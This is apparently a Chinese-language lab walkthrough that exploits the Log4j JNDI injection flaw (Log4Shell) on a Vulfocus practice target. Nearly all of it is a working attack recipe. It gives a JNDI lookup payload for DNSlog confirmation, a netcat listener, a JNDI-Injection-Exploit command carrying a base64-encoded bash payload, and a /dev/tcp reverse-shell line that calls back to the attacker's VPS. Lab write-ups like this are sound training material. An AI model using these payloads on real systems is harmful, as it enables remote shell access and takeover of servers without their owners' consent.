直接在vulfocus起一个靶场环境
burp抓包,看到提示参数是payload
dnslog验证
先来使用dnslog验证一下
${jndi:ldap://“ip”/poc} 这里的ip是dnslog获取到的域名
生成的payload需要url编码,下面可以看到验证成功,说明存在log4j,然后我们反弹shell拿权限
反弹shell
vps开启监听
nc -lvnp 2333
使用工具:https://github.com/Zard-ethan/JNDI-Injection-Exploit-1.0-SNAPSHOT-all启一个ldap服务:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,反弹shell的base64 编码}|{base64,-d}|{bash,-i}" -A "vps的ip"
反弹shell的命令:bash -i >&/dev/tcp/vps的ip/监听的端口 0>&1 #把这个反弹shell的命令进行base64编码,然后放到第一行的命令当中就可以了
然后去构造payload,进行url编码
使用burpsuit发送请求,看到成功反弹